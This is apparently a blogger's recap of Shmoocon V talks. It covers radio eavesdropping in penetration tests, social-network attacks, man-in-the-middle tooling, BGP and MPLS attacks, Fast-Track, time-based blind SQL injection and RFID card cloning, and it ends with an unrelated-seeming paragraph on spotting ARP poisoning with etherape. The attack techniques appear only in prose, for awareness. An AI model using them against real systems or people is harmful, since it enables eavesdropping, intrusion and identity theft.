I attended Shmoocon V over the weekend and had a good time as usual. There are always interesting people, the usual suspects, and some good talks. I think Shmoocon is still a great conference for the money. The bags given to attendees this year were by far the best of the four years I've been. There were some very good entries to the Barcode Shmarcode contest and I also saw some entertaining runs through the lockpick contest.
These notes do not include every time slot.
Friday
1500: Bruce Potter started the con with his opening remarks. He said that Shmoocon added around 500 tickets this year, bringing the total number of attendees above 1600. To have enough space, they had to add another room down the hall from the main area. The satellite room was out of sight of the main area, but not too difficult to find. Potter said that moving to the next larger space available instead of adding the one room would have been overkill and cost too much for the number of attendees.
One of the things I really like about Shmoocon is their involvement in charities. As usual, tshirt proceeds went to charities, in this case the buyer's choice between the EFF and Johnny Long's Hackers for Charity. Shmoocon also had a raffle with proceeds going to Covenant House, as did the proceeds from the Hacker Arcade. It is nice to see Bruce and other Shmoocon organizers promoting charity among their peers.
Potter often will make a small comparison between Shmoocon and other conferences, and this year he mentioned other conferences charging large amounts for training. Conversely, at Shmoocon if you want to learn something in a non-classroom environment, you can try to participate in Shmoocon Labs to help build a functional enterprise-like environment rather than just slapping together a simple wireless network. As an example, this year they had an open wireless network, a WPA-enabled wireless network, and third using RADIUS. All attendees are welcome to walk through the room serving as their NOC and ask questions.
I really like The Shmoo Group's philosophy when it comes to running a conference. They try to be very transparent and take feedback, don't overcharge, and just generally want everyone to have a great time while still providing good technical content. It's a really attendee-friendly conference, right down to the 0wn the Con talk near the end.
Finally, Potter went on a rant about how security isn't working. Nothing to see here, move along. ;)
1600: The first technical talk I heard was Matt Davis and Ethan O'Toole presenting Open Vulture - Scavenging the Friendly Skies Open Source UAV Platform. Open Vulture is a software application and library designed to control unmanned vehicles. It was a neat talk though not a topic I know much about. Some of the possible uses for this would be controlling an unmanned vehicle to sniff wireless networks or take photos. They even have a GPS navigation module.
Saturday
Saturday is always the meat of the conference since it is the only full day and most people haven't been there long enough for the late nights to catch up to them.
1000: I enjoyed Matt Neely's presentation, Radio Reconnaisance in Penetration Testing. Matt had a lot of practical advice for radio reconnaisance, including recommending some relatively inexpensive hand-held scanners, the AOR 8200, Uniden Bearcat BCD396T, and the Uniden Bearcat SC230, which also happens to be a good choice for NASCAR. He pointed out what features to look for in scanners, for example channel memory.
His anecdotes from penetration tests included sniffing wireless headsets from blocks away, even when the phone is hung up. Apparently, many wireless headsets transmit constantly even if on the cradle, effectively functioning like a bug for eavesdropping. He has also used video converters when sniffing video.
When testing a client's casino, he visually scouted the location to help identify their hand-held radios, and then was able to get information from casino security through their radio communications, including their radio link to the police. He got a ton of information useful for social engineering and more, like guard names, the dispatcher's name, times of shift changes, and the lingo used by the guards.
At another client site, he noticed people using wireless headsets and got those added to the rules of engagement. Once they were added, he was able to eavesdrop on calls to the help desk for password resets, people calling their voicemail, and found that the headsets would keep transmitting even when the phone was hung up. Matt was able to get passwords, voicemail passwords, and assorted Personally Identifiable Information (PII) that was sensitive or could be used for social engineering. Rules of engagement and adhering to applicable laws are very important if you don't want to end up in jail after eavesdropping on voice communications.
I also talked to Neely the next day regarding learning about RF for a personal project I am interested in. He was very helpful and nice, just like most Shmoocon presenters I've ever spoken with. Hopefully, I will have time to start learning more about RF and playing around with it for a "fun" project.
1100: Next, I attended Fail 2.0: Further Musings on Attacking Social Networks presented by Nathan Hamiel and Shawn Moyer. Their talk was fun and definitely relevant. Their main focus was that "social engineering + vulnerabilities in social networks = ROI". They pointed out a number of ways to manipulate various social networking sites, including malicious code like IMG to CSRF, CSS javascript hijacking, and request forgeries (POST to GET).
One good anecdote was getting permission from Marcus Ranum to make a phony profile in his name and then using it to socially engineer others, particularly security professionals, on a social networking site. They actually got Ranum's sister to attempt to contact them through the phony profile.
Hamiel and Moyer demonstrated technical tricks to force someone to "friend" you and also posting a comment with code that will force the user to log out, effectively denial-of-servicing the person off his or her own profile. They also told anecdotes about posing as a recruiter, joining groups on LinkedIn so they could more easily build up a lot of connections, then looking for candidates with government security clearances and getting many responses to their inquiries.
1400: I skipped the 1200 talks to have a long lunch with some friends, then attended Jay Beale's Man in the Middling Everything with the Middler. The talk had a very slow start because of audience interaction, particularly involving Shmooballs and launchers.
Jay Beale's Middler is a tool to help leverage man-in-the-middle attacks, including injecting javascript, temporary or permanent redirects, session hijacking, and more. It seems like a neat tool and was released to the public at his talk. Jay pointed out some dangers of mixed HTTP and HTTPS sites and their vulnerabilities to things like injected javascript, stored session keys, intercepted logout requests, and replacing HTTPS links in proxied pages with HTTP links. Although the Middler has some specific support right now for attacking social networking sites and wide area sites like Google/GMail and live.com, it uses a plugin architecture so we should expect to see more plugins targeting specific sites.
1600: I had heard a good talk last year by Enno Rey and Daniel Mende, and combined with my focus on network security monitoring I definitely was interested in their presentation this year, Attacking backbone technologies. Their main focuses this year were BGP, MPLS, and Carrier Internet, one example of the latter being Carrier Ethernet. They were careful to point out that you really have to be part of the "old boys club" of trusted backbone providers to successfully use most of their attacks and that not just anyone would have enough access to core backbones to download their tools and use them for successful penetration testing or attacks.
For BGP, they mentioned that it is mostly manually configured, thus making it susceptible to simple mistakes like the famed AS7007 incident or the Youtube/Pakistan blocking incident. Rey and Mende also did a live demonstration using their "bgp_cli" tool to inject routes, and demonstrated how a single BGP packet signed with MD5 can be used to crack rather than brute forcing directly against a router that limits the number of attempts per second.
Multiprotocol Label Switching (MPLS) is deployed on carrier backbones and uses a trusted core assumption while attacks from outside the core are not possible. Rey and Mende demonstrated their "mpls_redirect" tool to modify MPLS Layer 3 VPN labels and redirect traffic. This is possible in part because of trusting carrier insiders and can be used to send traffic to different customer networks. Rey had a great line where we called it "branching" the traffic because he was told, due to his thick German accent, he should not use the word "forked" (or "fokt" as it sounded when he said it).
These two definitely are in a position to test the security of major providers from an insider perspective, which is not the norm, and they do a good job explaining some of the issues they find.
1700: David Kennedy's Fast-Track Suite: Advanced Penetration Techniques Made Easy was probably the most crowded presentation I attended. One suggestion I have for getting a good seat at Shmoocon is to plan your schedule ahead and note the presentations that are likely to be crowded. If you are not changing rooms, do not get up and lose your seat, because rooms definitely end up standing room only sometimes.
Kennedy was a good presenter. When you have fun on the podium, it definitely shows and keeps everyone attentive. He had a lot of audience participation as he showed a slide and said "Let's Pop a Box" each time before he used Fast-Track to own a system. When he started to forget "Let's Pop a Box," someone from the audience would invariably ask him if he forgot something or shout "Pop a Box!" as Kennedy did a face-palm.
Fast-Track itself is obviously pretty neat. He showed a variety of automated attacks against different targets that most often ended with a reverse shell back or reverse VNC back to his attacking system. He also talked about his evasion technique using Windows debug to download his stager, which is actually just a version of Windows debug without the 64k size limit.
Fast-Track 4.0 includes some new features like logging and payload conversion so you can load your own payloads to deliver. Although Fast-Track has a smaller list of exploits than Metasploit, Kennedy said that he strives to make them available across as many OS versions as possible. Version 4.0 also includes a mass client attack using ARP poisoning combined with emailed links to targets. The malicious page will display a generic "loading please wait..." message as it launches a multitude of attacks, but Kennedy said that 4.1 will also include browser profiling for more targeted exploits. One really nice feature is the auto-update to update a multitude of tools included in Fast-Track. Although I didn't look into it yet, I did wonder if it had any SNMP attacks and I think a SNMP auto-own attack would be a neat and not too complicated addition if it's not there yet.
Sunday
1000: I really feel for anyone in this time slot. After a weekend of hacking and partying, the number of people in any room is much smaller than the number of people at 1000 on Saturday. The numbers increase as people drag themselves into the talks through the hour.
I attended Re-Playing with (Blind) SQL Injection by Chema Alonso and Palako during this hour. I was starting to think I made the wrong choice because they started off slow and quite dry, but maybe they were included in the ones recovering from the previous night's festivities. By the second half, they started to have a little fun and had some funny moments, including a slide with, "Yes, we can!" Another funny moment was when they found a database username length of two and referred to it as "the most famous Microsoft SQL user..."
Although we've all probably seen or read about blind SQL injection before, they did have some interesting techniques and used their Marathon Tool to ease the tedious nature of blind SQL injection. One thing I liked was their method of using timing to seperate a True answer page from a False answer page if there is no visible or code difference. Most SQL engines have slightly different supported methods to introduce time-based blind SQL injection so a response that is timed above a certain value can be considered true. Even those that don't include time-delay functions can be leveraged with by running a "heavy" query only if a "light" query first returns as true. An example of a heavy query that would slow the response after a successful light query is multiple cross-table joins.
Alonso and Pakato also did a good job answering questions. They definitely seemed more comfortable by the end of their presentation.
1100: Chris Paget is a very entertaining presenter and clearly had fun showing off his RFID reader during EDL Cloning for Under $250. He demonstrated how easy it is to read, clone, and write RFID cards created as part of the Western Hemisphere Travel Initiative. By design, these cards are supposed to be readable from 30 feet but it is trivial to read them at more than 200 feet and much longer distances, possibly around half a mile, should be possible. The cards also have no encryption or authentication.
Paget was able to buy an enterprise-level card reader by Motorola on eBay. Although he needed to perform some repairs on the RFID reader, the whole sniffing setup was only around $250. The card reader has no real security mechanisms for logon and listens on port 3000.
There are no federal anti-skimming laws to prevent RFID skimming/sniffing, though CA and WA states do have laws. Paget was able to grab a lot of information through war driving with his setup and pointed out that correlation means the cards can provide more than just an anonymous number. For instance, if you detect the same card tag twice you could compare it to photos to see whose face you saw twice. You could also correlate against other data like credit cards containing RFID to figure out which data belonged to which person.
Eventually as RFID cards become more common, this could present more serious issues like collecting tons of RFID card data until you get one where the person's appearance is close enough that you could use his identity, or terrorists could use it to identify targets in a crowd.
Paget stated that the supposed purpose for the cards was to enhance security, which clearly is a failure, and also to speed border crossings, which also has been a failure since users still have to present their cards directly. Paget believes that WHTI is broken but that RealID could be an alternative if it was revamped to fix all the serious problems. Ideally, among other recommendations, he advocates a contact smartcard rather than one that can be read remotely.
Another Shmoocon in the books. Thanks to the Shmoo Group, speakers and attendees for a good time.
Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that's an indicator that you're successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I've seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.
